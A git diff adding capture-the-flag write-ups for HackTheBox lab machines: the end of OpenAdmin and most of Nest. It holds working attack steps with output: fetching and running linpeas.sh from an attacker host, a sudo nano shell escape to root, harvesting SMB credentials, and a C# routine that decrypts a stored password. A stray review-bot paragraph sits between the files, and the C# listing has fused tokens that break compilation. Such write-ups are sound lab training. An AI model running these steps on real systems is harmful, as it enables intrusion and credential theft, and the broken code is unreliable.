+ --2021-05-27 08:26:50-- http://10.10.14.13:9090/linpeas.sh
+ Connecting to 10.10.14.13:9090... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 341863 (334K) [text/x-sh]
+ Saving to: ‘linpeas.sh’
+
+ linpeas.sh 100%[====================================================================================================================================================>] 333.85K 696KB/s in 0.5s
+
+ 2021-05-27 08:26:50 (696 KB/s) - ‘linpeas.sh’ saved [341863/341863]
+
+ joanna@openadmin:~$ chmod +x linpeas.sh
+ joanna@openadmin:~$ ./linpeas.sh
+
+
+
+` 
+
+And here we see that joanna can run nano as the root user:
+
+
+ joanna@openadmin:~$ sudo -l
+ Matching Defaults entries for joanna on openadmin:
+ env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
+
+ User joanna may run the following commands on openadmin:
+ (ALL) NOPASSWD: /bin/nano /opt/priv
+
+
+
+Nano allows inserting external files into the current one using the shortcut CTRL+R, so let's do it:
+
+
+ joanna@openadmin:~$ sudo -u root /bin/nano /opt/priv
+ ^R
+
+
+` 
+
+Here we see that we can execute a command using CTRL+X, so we're going to get a shell using the following:
+
+
+
+The shell gets a bit weird once you do it but it effectively spawns a root shell as intended:
+
+
+
+
+ Command to execute: reset; sh 1>&0 2>&0# id
+ uid=0(root) gid=0(root) groups=0(root) ^X Read File
+ # cat /root/root.txt M-F New Buffer
+ 2fXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+
+And that's it! We managed to get a root shell and print the root flag.
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
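Review bot: the reverse-tunnel example `ssh -R 1337:127.0.0.1:52946 root@10.10.14.13` points at port 52946, but the vhost in `/etc/apache2/sites-enabled/internal.conf` has `Listen 127.0.0.1:52846` and the later `curl localhost:52846/main.php` uses 52846; fix the port so readers who take the tunnel route do not hit a closed socket. The sentence "And we get the password 'Revealed'! So let's create a ssh tunnel" is also misleading as written: the SHA-512 hash cracked by john comes from the `$_POST['password']` check in `index.php`, so 'Revealed' is the login for the internal web form on 52846, while the SSH session that follows authenticates jimmy with the reused database password `n1nj4W4rri0R!` from `database_settings.inc.php`; say which credential is which, and note that reading `main.php` directly from the filesystem-readable vhost sidesteps the form entirely. Minor: the PHP listing renders `<?php` and `?>` as `<****?php` / `?****>`, so it will not copy-paste; "alot" should be "a lot" and "it's php sourcecode" should be "its PHP source code".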
diff --git a/Easy/42.md b/Easy/42.md
new file mode 100644
index 0000000..b1e5b47
--- /dev/null
+++ b/Easy/42.md
@@ -0,0 +1,886 @@
+# Nest Writeup
+
+
+
+## Introduction :
+
+Nest is an easy windows box released back in january 2020.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/1 ] [Nextcloud/blog]
+ → sudo nmap -vvv -p- 10.10.10.178 --max-retries 0 -Pn --min-rate=500 2>/dev/null | grep Discovered
+ [sudo] password for nothing:
+ Discovered open port 445/tcp on 10.10.10.178
+ Discovered open port 4386/tcp on 10.10.10.178
+
+ [ 10.10.14.13/23 ] [ /dev/pts/1 ] [Nextcloud/blog]
+ → nmap -sCV -p445,4386 10.10.10.178 -Pn
+ Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
+ Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-28 08:30 CEST
+ Nmap scan report for 10.10.10.178
+ Host is up (0.032s latency).
+
+ PORT STATE SERVICE VERSION
+ 445/tcp open microsoft-ds?
+ 4386/tcp open unknown
+ | fingerprint-strings:
+ | DNSStatusRequestTCP, DNSVersionBindReqTCP, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NULL, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, X11Probe:
+ | Reporting Service V1.2
+ | FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, RTSPRequest, SIPOptions:
+ | Reporting Service V1.2
+ | Unrecognised command
+ | Help:
+ | Reporting Service V1.2
+ | This service allows users to run queries against databases using the legacy HQK format
+ | AVAILABLE COMMANDS ---
+ | LIST
+ | SETDIR <****Directory_Name>
+ | RUNQUERY <****Query_ID>
+ | DEBUG <****Password>
+ |_ HELP <****Command>
+ 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
+ SF-Port4386-TCP:V=7.91%I=7%D=5/28%Time=60B08DFE%P=x86_64-pc-linux-gnu%r(NU
+ SF:LL,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(GenericLin
+ SF:es,3A,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>\r\nUnrecognise
+ SF:d\x20command\r\n>")%r(GetRequest,3A,"\r\nHQK\x20Reporting\x20Service\x2
+ SF:0V1\.2\r\n\r\n>\r\nUnrecognised\x20command\r\n>")%r(HTTPOptions,3A,"\r\
+ SF:nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>\r\nUnrecognised\x20comma
+ SF:nd\r\n>")%r(RTSPRequest,3A,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\
+ SF:n\r\n>\r\nUnrecognised\x20command\r\n>")%r(RPCCheck,21,"\r\nHQK\x20Repo
+ SF:rting\x20Service\x20V1\.2\r\n\r\n>")%r(DNSVersionBindReqTCP,21,"\r\nHQK
+ SF:\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(DNSStatusRequestTCP,21,"
+ SF:\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(Help,F2,"\r\nHQK\
+ SF:x20Reporting\x20Service\x20V1\.2\r\n\r\n>\r\nThis\x20service\x20allows\
+ SF:x20users\x20to\x20run\x20queries\x20against\x20databases\x20using\x20th
+ SF:e\x20legacy\x20HQK\x20format\r\n\r\n---\x20AVAILABLE\x20COMMANDS\x20---
+ SF:\r\n\r\nLIST\r\nSETDIR\x20 <****Directory_Name>\r\nRUNQUERY\x20 <****Query_ID>\r\
+ SF:nDEBUG\x20 <****Password>\r\nHELP\x20 \r\n>")%r(SSLSessionReq,21,"\r
+ SF:\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(TerminalServerCooki
+ SF:e,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(TLSSessionR
+ SF:eq,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(Kerberos,2
+ SF:1,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(SMBProgNeg,21,
+ SF:"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(X11Probe,21,"\r\
+ SF:nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(FourOhFourRequest,3A
+ SF:,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>\r\nUnrecognised\x20
+ SF:command\r\n>")%r(LPDString,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2
+ SF:\r\n\r\n>")%r(LDAPSearchReq,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.
+ SF:2\r\n\r\n>")%r(LDAPBindReq,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2
+ SF:\r\n\r\n>")%r(SIPOptions,3A,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r
+ SF:\n\r\n>\r\nUnrecognised\x20command\r\n>")%r(LANDesk-RC,21,"\r\nHQK\x20R
+ SF:eporting\x20Service\x20V1\.2\r\n\r\n>")%r(TerminalServer,21,"\r\nHQK\x2
+ SF:0Reporting\x20Service\x20V1\.2\r\n\r\n>");
+
+ Host script results:
+ |_clock-skew: 7m38s
+ | smb2-security-mode:
+ | 2.02:
+ |_ Message signing enabled but not required
+ | smb2-time:
+ | date: 2021-05-28T06:40:33
+ |_ start_date: 2021-05-28T06:32:49
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 198.72 seconds
+
+
+
+## **Part 2 : Getting User Access**
+
+Our nmap scan picked up port 445 so let's investigate it:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/1 ] [Nextcloud/blog]
+ → smbclient -L \\\\10.10.10.178
+ Enter WORKGROUP\nothing's password:
+
+ Sharename Type Comment
+ --------- ---- -------
+ ADMIN$ Disk Remote Admin
+ C$ Disk Default share
+ Data Disk
+ IPC$ IPC Remote IPC
+ Secure$ Disk
+ Users Disk
+ SMB1 disabled -- no workgroup available
+
+ [ 10.10.14.13/23 ] [ /dev/pts/1 ] [Nextcloud/blog]
+ → smbmap -H 10.10.10.178 -u anonymous -r --depth 5
+ [+] Guest session IP: 10.10.10.178:445 Name: 10.10.10.178
+ Disk Permissions Comment
+ ---- ----------- -------
+ ADMIN$ NO ACCESS Remote Admin
+ C$ NO ACCESS Default share
+ Data READ ONLY
+ .\Data\*
+ dr--r--r-- 0 Thu Aug 8 00:53:46 2019 .
+ dr--r--r-- 0 Thu Aug 8 00:53:46 2019 ..
+ dr--r--r-- 0 Thu Aug 8 00:58:07 2019 IT
+ dr--r--r-- 0 Mon Aug 5 23:53:41 2019 Production
+ dr--r--r-- 0 Mon Aug 5 23:53:50 2019 Reports
+ dr--r--r-- 0 Wed Aug 7 21:07:51 2019 Shared
+ IPC$ NO ACCESS Remote IPC
+ Secure$ NO ACCESS
+ Users READ ONLY
+ .\Users\*
+ dr--r--r-- 0 Sun Jan 26 00:04:21 2020 .
+ dr--r--r-- 0 Sun Jan 26 00:04:21 2020 ..
+ dr--r--r-- 0 Fri Aug 9 17:08:23 2019 Administrator
+ dr--r--r-- 0 Sun Jan 26 08:21:44 2020 C.Smith
+ dr--r--r-- 0 Thu Aug 8 19:03:29 2019 L.Frost
+ dr--r--r-- 0 Thu Aug 8 19:02:56 2019 R.Thompson
+ dr--r--r-- 0 Thu Aug 8 00:56:02 2019 TempUser
+
+
+Here it looks like the Data sgare seems to be accessible anonymously. So we can recursively list the contents of that share using smbclient:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/1 ] [Nextcloud/blog]
+ → smbclient \\\\10.10.10.178\\Data
+ Enter WORKGROUP\nothing's password:
+ Try "help" to get a list of possible commands.
+ smb: \> recurse on
+ smb: \> ls
+ . D 0 Thu Aug 8 00:53:46 2019
+ .. D 0 Thu Aug 8 00:53:46 2019
+ IT D 0 Thu Aug 8 00:58:07 2019
+ Production D 0 Mon Aug 5 23:53:38 2019
+ Reports D 0 Mon Aug 5 23:53:44 2019
+ Shared D 0 Wed Aug 7 21:07:51 2019
+
+ \IT
+ NT_STATUS_ACCESS_DENIED listing \IT\*
+
+ \Production
+ NT_STATUS_ACCESS_DENIED listing \Production\*
+
+ \Reports
+ NT_STATUS_ACCESS_DENIED listing \Reports\*
+
+ \Shared
+ . D 0 Wed Aug 7 21:07:51 2019
+ .. D 0 Wed Aug 7 21:07:51 2019
+ Maintenance D 0 Wed Aug 7 21:07:32 2019
+ Templates D 0 Wed Aug 7 21:08:07 2019
+
+ \Shared\Maintenance
+ . D 0 Wed Aug 7 21:07:32 2019
+ .. D 0 Wed Aug 7 21:07:32 2019
+ Maintenance Alerts.txt A 48 Tue Aug 6 01:01:44 2019
+
+ \Shared\Templates
+ . D 0 Wed Aug 7 21:08:07 2019
+ .. D 0 Wed Aug 7 21:08:07 2019
+ HR D 0 Wed Aug 7 21:08:01 2019
+ Marketing D 0 Wed Aug 7 21:08:06 2019
+
+ \Shared\Templates\HR
+ . D 0 Wed Aug 7 21:08:01 2019
+ .. D 0 Wed Aug 7 21:08:01 2019
+ Welcome Email.txt A 425 Thu Aug 8 00:55:36 2019
+
+ \Shared\Templates\Marketing
+ . D 0 Wed Aug 7 21:08:06 2019
+ .. D 0 Wed Aug 7 21:08:06 2019
+
+ smb: \> cd \Shared\Templates\HR
+ smb: \Shared\Templates\HR\> ls
+ . D 0 Wed Aug 7 21:08:01 2019
+ .. D 0 Wed Aug 7 21:08:01 2019
+ Welcome Email.txt A 425 Thu Aug 8 00:55:36 2019
+
+ 10485247 blocks of size 4096. 6543390 blocks available
+
+ smb: \Shared\Templates\HR\> mget "Welcome Email.txt"
+ Get file Welcome Email.txt? y
+ getting file \Shared\Templates\HR\Welcome Email.txt of size 425 as Welcome Email.txt (3.2 KiloBytes/sec) (average 3.2 KiloBytes/sec)
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/1 ] [~/HTB/Nest]
+ → cat Welcome\ Email.txt
+ We would like to extend a warm welcome to our newest member of staff,
+
+ You will find your home folder in the following location:
+ \\HTB-NEST\Users\
+
+ If you have any issues accessing specific services or workstations, please inform the
+ IT department and use the credentials below until all systems have been set up for you.
+
+ Username: TempUser
+ Password: welcome2019
+
+
+ Thank you
+ HR
+
+
+Here we get credentials: **TempUser:welcome2019** So let's run smbmap once again to enumerate the shares:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/1 ] [~/HTB/Nest]
+ → smbmap -u Tempuser -p welcome2019 -H 10.10.10.178
+ [+] IP: 10.10.10.178:445 Name: 10.10.10.178
+ Disk Permissions Comment
+ ---- ----------- -------
+ ADMIN$ NO ACCESS Remote Admin
+ C$ NO ACCESS Default share
+ Data READ ONLY
+ IPC$ NO ACCESS Remote IPC
+ Secure$ READ ONLY
+ Users READ ONLY
+
+
+Now as we explore the shares with the tempuser we can access xml files for example:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/1 ] [~/HTB/Nest]
+ → smbmap -u Tempuser -p welcome2019 -H 10.10.10.178 -R 'Data' -A xml
+ [+] IP: 10.10.10.178:445 Name: 10.10.10.178
+ [+] Starting search for files matching 'xml' on share Data.
+ [+] Match found! Downloading: Data\IT\Configs\Adobe\editing.xml
+ [+] Match found! Downloading: Data\IT\Configs\Adobe\projects.xml
+ [+] Match found! Downloading: Data\IT\Configs\Adobe\settings.xml
+ [+] Match found! Downloading: Data\IT\Configs\Atlas\Temp.XML
+ [+] Match found! Downloading: Data\IT\Configs\Microsoft\Options.xml
+ [+] Match found! Downloading: Data\IT\Configs\NotepadPlusPlus\config.xml
+ [+] Match found! Downloading: Data\IT\Configs\NotepadPlusPlus\shortcuts.xml
+ [+] Match found! Downloading: Data\IT\Configs\RU Scanner\RU_config.xml
+
+ [ 10.10.14.13/23 ] [ /dev/pts/1 ] [~/HTB/Nest]
+ → ls -lash
+ total 52K
+ 4.0K drwxr-xr-x 2 nothing nothing 4.0K May 28 09:29 .
+ 4.0K drwxr-xr-x 7 nothing nothing 4.0K May 28 09:02 ..
+ 4.0K -rw-r--r-- 1 nothing nothing 246 May 28 09:29 10.10.10.178-Data_IT_Configs_Adobe_editing.xml
+ 4.0K -rw-r--r-- 1 nothing nothing 258 May 28 09:29 10.10.10.178-Data_IT_Configs_Adobe_projects.xml
+ 4.0K -rw-r--r-- 1 nothing nothing 1.3K May 28 09:29 10.10.10.178-Data_IT_Configs_Adobe_settings.xml
+ 4.0K -rw-r--r-- 1 nothing nothing 1.4K May 28 09:29 10.10.10.178-Data_IT_Configs_Atlas_Temp.XML
+ 8.0K -rw-r--r-- 1 nothing nothing 4.5K May 28 09:29 10.10.10.178-Data_IT_Configs_Microsoft_Options.xml
+ 8.0K -rw-r--r-- 1 nothing nothing 6.3K May 28 09:29 10.10.10.178-Data_IT_Configs_NotepadPlusPlus_config.xml
+ 4.0K -rw-r--r-- 1 nothing nothing 2.1K May 28 09:29 10.10.10.178-Data_IT_Configs_NotepadPlusPlus_shortcuts.xml
+ 4.0K -rw-r--r-- 1 nothing nothing 270 May 28 09:29 '10.10.10.178-Data_IT_Configs_RU Scanner_RU_config.xml'
+ 4.0K -rw-r--r-- 1 nothing nothing 425 May 28 09:02 'Welcome Email.txt'
+
+
+
+Let's check if there is any sensitive information in the xml files we collected:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/1 ] [~/HTB/Nest]
+ → vim 10.10.10.178-Data_IT_Configs_Adobe_settings.xml
+
+ [ 10.10.14.13/23 ] [ /dev/pts/1 ] [~/HTB/Nest]
+ → grep -i password *.xml
+ 10.10.10.178-Data_IT_Configs_RU Scanner_RU_config.xml: fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=
+ [ 10.10.14.13/23 ] [ /dev/pts/1 ] [~/HTB/Nest]
+ → cat 10.10.10.178-Data_IT_Configs_RU\ Scanner_RU_config.xml
+ <****?xml version="1.0"?> <****ConfigFile xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"> <****Port>389 <****/Port> <****Username>c.smith <****/Username> <****Password>fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE= <****/Password> <****/ConfigFile>%
+
+So here it looks like that the password for the user **c.smith** is encrypted. Now what we should look for is the Secure share in the xml files, and we stumble upon the **NotePadPlusPlus** config file:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/1 ] [~/HTB/Nest]
+ → grep -i 'Secure\$' *.xml
+ 10.10.10.178-Data_IT_Configs_NotepadPlusPlus_config.xml: <****File filename="\\HTB-NEST\Secure$\IT\Carl\Temp.txt" />
+
+Now we're hinted towards a Temp.txt file, so let's get it:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/1 ] [~/HTB/Nest]
+ → smbmap -u Tempuser -p welcome2019 -H 10.10.10.178 -R 'Secure$\IT\Carl'
+ [+] IP: 10.10.10.178:445 Name: 10.10.10.178
+ Disk Permissions Comment
+ ---- ----------- -------
+ Secure$ READ ONLY
+ .\Secure$IT\Carl\*
+ dr--r--r-- 0 Wed Aug 7 21:42:14 2019 .
+ dr--r--r-- 0 Wed Aug 7 21:42:14 2019 ..
+ dr--r--r-- 0 Wed Aug 7 21:44:00 2019 Docs
+ dr--r--r-- 0 Tue Aug 6 15:45:47 2019 Reports
+ dr--r--r-- 0 Tue Aug 6 16:41:55 2019 VB Projects
+ .\Secure$IT\Carl\Docs\*
+ dr--r--r-- 0 Wed Aug 7 21:44:00 2019 .
+ dr--r--r-- 0 Wed Aug 7 21:44:00 2019 ..
+ fr--r--r-- 56 Wed Aug 7 21:44:16 2019 ip.txt
+ fr--r--r-- 73 Wed Aug 7 21:43:46 2019 mmc.txt
+ .\Secure$IT\Carl\VB Projects\*
+ dr--r--r-- 0 Tue Aug 6 16:41:55 2019 .
+ dr--r--r-- 0 Tue Aug 6 16:41:55 2019 ..
+ dr--r--r-- 0 Tue Aug 6 16:41:53 2019 Production
+ dr--r--r-- 0 Tue Aug 6 16:47:41 2019 WIP
+ .\Secure$IT\Carl\VB Projects\WIP\*
+ dr--r--r-- 0 Tue Aug 6 16:47:41 2019 .
+ dr--r--r-- 0 Tue Aug 6 16:47:41 2019 ..
+ dr--r--r-- 0 Fri Aug 9 17:36:45 2019 RU
+ .\Secure$IT\Carl\VB Projects\WIP\RU\*
+ dr--r--r-- 0 Fri Aug 9 17:36:45 2019 .
+ dr--r--r-- 0 Fri Aug 9 17:36:45 2019 ..
+ dr--r--r-- 0 Thu Aug 8 00:05:54 2019 RUScanner
+ fr--r--r-- 871 Fri Aug 9 17:36:35 2019 RUScanner.sln
+ .\Secure$IT\Carl\VB Projects\WIP\RU\RUScanner\*
+ dr--r--r-- 0 Thu Aug 8 00:05:54 2019 .
+ dr--r--r-- 0 Thu Aug 8 00:05:54 2019 ..
+ dr--r--r-- 0 Wed Aug 7 22:00:11 2019 bin
+ fr--r--r-- 772 Thu Aug 8 00:05:09 2019 ConfigFile.vb
+ fr--r--r-- 279 Thu Aug 8 00:05:44 2019 Module1.vb
+ dr--r--r-- 0 Wed Aug 7 22:00:11 2019 My Project
+ dr--r--r-- 0 Wed Aug 7 22:00:11 2019 obj
+ fr--r--r-- 4828 Fri Aug 9 17:38:30 2019 RU Scanner.vbproj
+ fr--r--r-- 143 Wed Aug 7 22:00:28 2019 RU Scanner.vbproj.user
+ fr--r--r-- 133 Thu Aug 8 00:05:58 2019 SsoIntegration.vb
+ fr--r--r-- 4888 Thu Aug 8 00:06:03 2019 Utils.vb
+
+
+And we were able to list the contents, the folder contains a Visual Basic project called RUScanner. so let's mount the share locally to examine the files:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/1 ] [~/HTB/Nest]
+ → sudo mkdir /mnt/Data
+ [sudo] password for nothing:
+
+ [ 10.10.14.13/23 ] [ /dev/pts/1 ] [~/HTB/Nest]
+ → sudo mount -t cifs -o ro,username=TempUser,password=welcome2019 '//10.10.10.178/Secure$' /mnt/Data/
+
+ [ 10.10.14.13/23 ] [ /dev/pts/1 ] [~/HTB/Nest]
+ → ls /mnt/Data
+ Finance HR IT
+
+ ┌──(root💀nowhere)-[/mnt/Data/IT]
+ └─# cd /mnt/Data/IT/Carl/VB\ Projects/WIP/RU/RUScanner 130 ⨯
+
+ ┌──(root💀nowhere)-[/mnt/…/VB Projects/WIP/RU/RUScanner]
+ └─# ls -lash
+ total 33K
+ 4.0K drwxr-xr-x 2 root root 4.0K Aug 8 2019 .
+ 4.0K drwxr-xr-x 2 root root 4.0K Aug 9 2019 ..
+ 0 drwxr-xr-x 2 root root 0 Aug 7 2019 bin
+ 4.0K -rwxr-xr-x 1 root root 772 Aug 8 2019 ConfigFile.vb
+ 512 -rwxr-xr-x 1 root root 279 Aug 8 2019 Module1.vb
+ 0 drwxr-xr-x 2 root root 0 Aug 7 2019 'My Project'
+ 0 drwxr-xr-x 2 root root 0 Aug 7 2019 obj
+ 8.0K -rwxr-xr-x 1 root root 4.8K Aug 9 2019 'RU Scanner.vbproj'
+ 512 -rwxr-xr-x 1 root root 143 Aug 6 2019 'RU Scanner.vbproj.user'
+ 4.0K -rwxr-xr-x 1 root root 133 Aug 8 2019 SsoIntegration.vb
+ 8.0K -rwxr-xr-x 1 root root 4.8K Aug 7 2019 Utils.vb
+
+
+And here the important file is Utils.vb:
+
+
+ Imports System.Text
+ Imports System.Security.Cryptography
+ Public Class Utils
+
+ Public Shared Function GetLogFilePath() As String
+ Return IO.Path.Combine(Environment.CurrentDirectory, "Log.txt")
+ End Function
+
+
+
+
+ Public Shared Function DecryptString(EncryptedString As String) As String
+ If String.IsNullOrEmpty(EncryptedString) Then
+ Return String.Empty
+ Else
+ Return Decrypt(EncryptedString, "N3st22", "88552299", 2, "464R5DFA5DL6LE28", 256)
+ End If
+ End Function
+
+ Public Shared Function EncryptString(PlainString As String) As String
+ If String.IsNullOrEmpty(PlainString) Then
+ Return String.Empty
+ Else
+ Return Encrypt(PlainString, "N3st22", "88552299", 2, "464R5DFA5DL6LE28", 256)
+ End If
+ End Function
+
+ Public Shared Function Encrypt(ByVal plainText As String, _
+ ByVal passPhrase As String, _
+ ByVal saltValue As String, _
+ ByVal passwordIterations As Integer, _
+ ByVal initVector As String, _
+ ByVal keySize As Integer) _
+ As String
+
+ Dim initVectorBytes As Byte() = Encoding.ASCII.GetBytes(initVector)
+ Dim saltValueBytes As Byte() = Encoding.ASCII.GetBytes(saltValue)
+ Dim plainTextBytes As Byte() = Encoding.ASCII.GetBytes(plainText)
+ Dim password As New Rfc2898DeriveBytes(passPhrase, _
+ saltValueBytes, _
+ passwordIterations)
+
+
+Basically here, we see that the class contains methods to encrypt and decrypt passwords. We can use the decryptString() function to decrypt the password gained earlier. As the code uses .NET classes, it can be rewritten in any .NET based language, therefore it can be ported to C#, and compiled on linux thanks to [mono](https://www.mono-project.com/download/stable/#download-lin-ubuntu), so let's install it:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/1 ] [~/HTB/Nest]
+ → apt search mono-devel
+ Sorting... Done
+ Full Text Search... Done
+ mono-devel/kali-rolling 6.8.0.105+dfsg-3 all
+ Mono development tools
+
+ [ 10.10.14.13/23 ] [ /dev/pts/1 ] [~/HTB/Nest]
+ → apt install mono-devel
+
+
+
+Now that we know the sourcecode, let's write the decrypt() function in C#, to which we will pass the encrypted password we found earlier:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/6 ] [~/HTB/Nest]
+ → vim decrypt.cs
+
+
+
+
+
+ using System;
+ using System.IO;
+ using System.Text;
+ using System.Security.Cryptography;
+ namespace Dec {
+ class Decryptor{
+ public static void Main(){
+ var pt = Decrypt("fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=", "N3st22","88552299", 2, "464R5DFA5DL6LE28", 256);
+ Console.WriteLine("PlainText: " + pt);
+ }
+ public static String Decrypt(String cipherText, String passPhrase, String saltValue, int passwordIterations, String initVector, int keySize ) {
+ var initVectorBytes=Encoding.ASCII.GetBytes(initVector);
+ var saltValueBytes=Encoding.ASCII.GetBytes(saltValue);
+ var cipherTextBytes=Convert.FromBase64String(cipherText);
+ var password=newRfc2898DeriveBytes(passPhrase, saltValueBytes,passwordIterations);
+ var keyBytes=password.GetBytes(keySize/8);
+ var symmetricKey=newAesCryptoServiceProvider();
+ symmetricKey.Mode=CipherMode.CBC;
+ var decryptor=symmetricKey.CreateDecryptor(keyBytes, initVectorBytes);
+ var memoryStream=newMemoryStream(cipherTextBytes);
+ var cryptoStream=newCryptoStream(memoryStream, decryptor,CryptoStreamMode.Read);
+ var plainTextBytes=newbyte[cipherTextBytes.Length];
+ var decryptedByteCount=cryptoStream.Read(plainTextBytes, 0,plainTextBytes.Length);
+ memoryStream.Close();
+ cryptoStream.Close();
+ varplainText=Encoding.ASCII.GetString(plainTextBytes, 0,decryptedByteCount);
+ returnplainText;
+ }
+
+ }
+ }
+
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/1 ] [~/HTB/Nest]
+ → mcs decrypt.cs
+
+ [ 10.10.14.13/23 ] [ /dev/pts/1 ] [~/HTB/Nest]
+ → ./decrypt.exe
+ Plaintext: xRxRxPANCAK3SxRxRx
+
+
+And we decrypted **c.smith** 's password ! **xRxRxPANCAK3SxRxRx**
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/6 ] [~/HTB/Nest]
+ → sudo umount /mnt/Data
+ [sudo] password for nothing:
+
+ [ 10.10.14.13/23 ] [ /dev/pts/6 ] [~/HTB/Nest]
+ → smbclient -U c.smith //10.10.10.178/Users
+ Enter WORKGROUP\c.smith's password: xRxRxPANCAK3SxRxRx
+ Try "help" to get a list of possible commands.
+ smb: \> cd c.smith
+ smb: \c.smith\> ls
+ . D 0 Sun Jan 26 08:21:44 2020
+ .. D 0 Sun Jan 26 08:21:44 2020
+ HQK Reporting D 0 Fri Aug 9 01:06:17 2019
+ user.txt A 32 Fri Aug 9 01:05:24 2019
+
+ smb: \c.smith\> get user.txt
+ getting file \c.smith\user.txt of size 32 as user.txt (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)
+
+ smb: \c.smith\>
+
+ [ 10.10.14.13/23 ] [ /dev/pts/1 ] [~/HTB/Nest]
+ → cat user.txt
+ cfXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+
+And we managed to get the user flag!
+
+## **Part 3 : Getting Root Access**
+
+Now in order to privesc, we need to take a look at the HQK Reporting folder:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/6 ] [~/HTB/Nest]
+ → smbclient -U c.smith //10.10.10.178/Users
+ Enter WORKGROUP\c.smith's password:
+ Try "help" to get a list of possible commands.
+
+ smb: \> ls
+ . D 0 Sun Jan 26 00:04:21 2020
+ .. D 0 Sun Jan 26 00:04:21 2020
+ Administrator D 0 Fri Aug 9 17:08:23 2019
+ C.Smith D 0 Sun Jan 26 08:21:44 2020
+ L.Frost D 0 Thu Aug 8 19:03:01 2019
+ R.Thompson D 0 Thu Aug 8 19:02:50 2019
+ TempUser D 0 Thu Aug 8 00:55:56 2019
+
+ 10485247 blocks of size 4096. 6543251 blocks available
+
+ smb: \> cd c.smith
+
+ smb: \c.smith\> ls
+ . D 0 Sun Jan 26 08:21:44 2020
+ .. D 0 Sun Jan 26 08:21:44 2020
+ HQK Reporting D 0 Fri Aug 9 01:06:17 2019
+ user.txt A 32 Fri Aug 9 01:05:24 2019
+
+ 10485247 blocks of size 4096. 6543251 blocks available
+
+ smb: \c.smith\> cd "HQK Reporting"
+
+ smb: \c.smith\HQK Reporting\> ls
+ . D 0 Fri Aug 9 01:06:17 2019
+ .. D 0 Fri Aug 9 01:06:17 2019
+ AD Integration Module D 0 Fri Aug 9 14:18:42 2019
+ Debug Mode Password.txt A 0 Fri Aug 9 01:08:17 2019
+ HQK_Config_Backup.xml A 249 Fri Aug 9 01:09:05 2019
+
+ 10485247 blocks of size 4096. 6543251 blocks available
+
+ smb: \c.smith\HQK Reporting\> allinfo "Debug Mode Password.txt"
+ altname: DEBUGM~1.TXT
+ create_time: Fri Aug 9 01:06:12 AM 2019 CEST
+ access_time: Fri Aug 9 01:06:12 AM 2019 CEST
+ write_time: Fri Aug 9 01:08:17 AM 2019 CEST
+ change_time: Fri Aug 9 01:08:17 AM 2019 CEST
+ attributes: A (20)
+ stream: [::$DATA], 0 bytes
+ stream: [:Password:$DATA], 15 bytes
+
+ smb: \c.smith\HQK Reporting\>
+
+
+Now here we see something interesting, we get hinted at a file called **Debug Mode Password.txt** , and it has file attributes, or Alternate Data Streams (ADS) attached to it. So let's get the file itself:
+
+
+ smb: \c.smith\HQK Reporting\> get "Debug Mode Password.txt:Password"
+ getting file \c.smith\HQK Reporting\Debug Mode Password.txt:Password of size 15 as Debug Mode Password.txt:Password (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
+ smb: \c.smith\HQK Reporting\> exit
+
+ [ 10.10.14.13/23 ] [ /dev/pts/6 ] [~/HTB/Nest]
